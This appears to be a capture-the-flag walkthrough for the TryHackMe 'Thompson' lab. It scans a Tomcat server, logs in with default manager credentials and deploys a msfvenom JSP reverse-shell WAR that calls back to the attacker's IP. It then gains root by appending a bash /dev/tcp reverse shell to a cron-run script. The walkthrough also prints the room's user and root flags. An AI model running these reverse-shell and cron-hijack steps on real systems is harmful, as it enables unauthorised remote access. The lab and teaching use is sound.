Home
Gazette
Reporter
Favorite
Prize
Pricing
About
Terms
Legals
Video
Contact
Login...
   Gazette    Reporter

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


31/10/2024 Shad Hussain Knowledge Views 586 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - Thompson - THM 

Room link : https://tryhackme.com/r/room/bsidesgtthompson


STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.130.169
FINDING
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat 8.5.5
NOTE
http is running on port 8080
---------------------------------------------------------------------------------------------------------
STEP2
dirb http://10.10.130.169:8080/

FINDING
+ http://10.10.130.169:8080/docs (CODE:302|SIZE:0)                                                                         
+ http://10.10.130.169:8080/examples (CODE:302|SIZE:0)                                                                     
+ http://10.10.130.169:8080/favicon.ico (CODE:200|SIZE:21630)                                                              
+ http://10.10.130.169:8080/host-manager (CODE:302|SIZE:0)                                                                 
+ http://10.10.130.169:8080/manager (CODE:302|SIZE:0) 
---------------------------------------------------------------------------------------------------------
STEP3
http://10.10.130.169:8080/

FINDING
+ http://10.10.130.169:8080/docs (CODE:302|SIZE:0)                                                                         
+ http://10.10.130.169:8080/examples (CODE:302|SIZE:0)                                                                     
+ http://10.10.130.169:8080/favicon.ico (CODE:200|SIZE:21630)                                                              
+ http://10.10.130.169:8080/host-manager (CODE:302|SIZE:0)                                                                 
+ http://10.10.130.169:8080/manager (CODE:302|SIZE:0) 
NOTE
click on 10.10.130.169:8080/host-manager
you will get a login popup
cancel it and you will the user id and password
ername="tomcat" password="s3cret" roles="admin-gui"/
---------------------------------------------------------------------------------------------------------
STEP4
click on 10.10.130.169:8080/host-manager
enter user id and password -- ername="tomcat" password="s3cret"
FINDING
http://10.10.130.169:8080/manager/html

NOTE
upload revershell.war in upload and deploy 
---------------------------------------------------------------------------------------------------------
STEP5
create a .wr revershell using msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.65.196 LPORT=9999 -f war -o rshell.war
upload the file and see it appears in the list below
on new terminal open nc -nvlp 9999
click on the revershell which was uploaded and get e reverse shell
---------------------------------------------------------------------------------------------------------
STEP6
cd /home/jack
ls -la
cat user.txt
39400c90bc683a41a8935e4719f181bf
---------------------------------------------------------------------------------------------------------
STEP7
cat /etc/crontab
FINDING
cd /home/jack && bash id.sh
---------------------------------------------------------------------------------------------------------
STEP8
echo bash -i & /dev/tcp/10.17.65.196/8888 0&1  id.sh
open listner in new tab nc -nvlp 8888
after few mins you will get a root shell
---------------------------------------------------------------------------------------------------------
STEP9
on new root shell
ls -la
cd /root
ls -la
cat root.txt
d89d5391984c0450a95497153ae7ca3a
---------------------------------------------------------------------------------------------------------

No article(s) with matching content

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 




© mutebreak.com | All Rights Reserved